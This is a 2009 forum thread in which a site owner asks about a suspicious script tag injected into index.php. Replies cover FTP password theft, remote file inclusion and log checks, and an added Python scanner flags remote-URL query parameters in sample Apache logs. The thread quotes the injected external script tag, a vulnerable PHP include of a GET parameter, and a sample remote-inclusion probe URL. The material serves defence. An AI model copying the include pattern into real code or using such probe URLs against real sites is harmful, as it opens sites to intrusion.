ayok Posted April 27, 2009

Hi,

Recently I've found that some of my websites have been infected by something. I really don't know what to call it. Somewhere in the source (usually index.php or home.php) there is this suspicious line. I don't know what it is, but it seems harmful. The scripts are mostly like the one below:

<!-- ad --><script language=javascript src="http://counter.ironsteelmoney.com/show.js"></script><!-- /ad -->

My questions are: what should I call this? Am I being cracked/hacked? How could it have happened? I've deleted it, but I'm not sure whether it won't come back. Could anyone please help me?

Thank you,
ayok

Mchl Posted April 27, 2009

Possibly your FTP password got compromised. I hear there are worms that use the passwords stored in Total Commander to upload their code online.

ayok (Author) Posted April 27, 2009

So they know the FTP password of those sites? Is it simply a matter of deleting the line and changing the password to get rid of it? How can I avoid this coming back?

Thanks
ayok

Mchl Posted April 27, 2009

Change your password. Do not store your passwords in FTP clients. Scan your PC for malware.

premiso Posted April 27, 2009

Aside from a password being found out, it could be a script that dynamically includes a file, for example:

include($_GET['file']);

If url_fopen_wrappers are turned on, then that allows someone to inject their own code from a remote website by passing something like this:

index.php?file=http://www.mysite.com/exploit.txt

And voilà, their code gets executed, which would allow them to create a file to write to other files, etc. The gist of it is, you need to look at your code and see if there may be a vulnerability that allows someone access. To find the offending file you can look at the Apache access logs, as they will show you each GET request that was sent, and if you see something like the above URL being sent via GET, someone is probing and/or has found the vulnerability, and it usually can lead to you finding the offending file.

The only reason I know this is that one of my hosted users had an old version of OS Commerce that had an exploit in it, and this allowed someone to create a script that used my mail server to send out spam. Luckily they only screwed with OS Commerce, so it was as simple as backing up the products, installing the newer version to fix it, and deleting the file.

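Added example, not part of the original thread: one way to run the access-log check premiso describes, flagging GET requests whose query parameters carry a remote URL. The log lines are constructed samples in Apache combined format, and the function names and the ignore_paths parameter are assumptions of this example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Apache combined log format (not from a real server).
SAMPLE_LOG = """\
203.0.113.7 - - [27/Apr/2009:10:01:12 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [27/Apr/2009:10:02:40 +0000] "GET /index.php?file=http://www.mysite.com/exploit.txt HTTP/1.1" 200 312 "-" "libwww-perl/5.805"
198.51.100.23 - - [27/Apr/2009:10:02:44 +0000] "GET /shop/view.php?inc=ftp%3A%2F%2Fexample.invalid%2Fa.txt HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
203.0.113.9 - - [27/Apr/2009:10:05:02 +0000] "GET /out.php?url=http://example.org/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, request line and status from a common/combined log entry.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def find_remote_include_probes(log_text, ignore_paths=()):
    """Return one dict per GET parameter whose value is a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group("method") != "GET":
            continue  # unparsable line, or not a GET request
        parts = urlsplit(m.group("target"))
        if parts.path in ignore_paths:
            continue  # scripts known to take a URL on purpose (e.g. redirects)
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            # parse_qsl decodes once; decode again to catch double-encoded values.
            value = unquote(value).strip()
            if REMOTE_RE.match(value):
                hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "script": parts.path, "param": name,
                             "value": value, "status": int(m.group("status"))})
    return hits


def scripts_answering_200(hits):
    """Scripts that returned 200 to such a request: read their source first."""
    return sorted({h["script"] for h in hits if h["status"] == 200})


if __name__ == "__main__":
    for hit in find_remote_include_probes(SAMPLE_LOG, ignore_paths=("/out.php",)):
        print(hit)
```

A script that legitimately takes a URL, such as a redirect, is flagged too, which is what ignore_paths is for. A 200 status only says the script answered, not that the include succeeded.
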
Daniel0 Posted April 27, 2009

We did this to protect against what premiso just explained.

premiso Posted April 27, 2009

> We did this to protect against what premiso just explained.

Nice, I must have never noticed that before. That will be good to use when installing 3rd party scripts, where I do not know if they filter out includes or not.

Daniel0 Posted April 27, 2009

Yeah, that's what we're using it for as well. We don't have that much control over SMF, so it's nice to just block all requests like that.

The Little Guy Posted April 27, 2009

Are you using cPanel? One of my old web hosts was using that, and it got hacked, and whoever got in changed EVERYONE'S index and/or home files on the servers to something that was like hatred towards the U.S. It even got into the host's backup files. They then took the backup files offline in case that were to happen again.

It is also possible:
- hacked username/password
- Anonymous FTP is on
- You have a coding error

and according to Firefox: Reported Attack Site!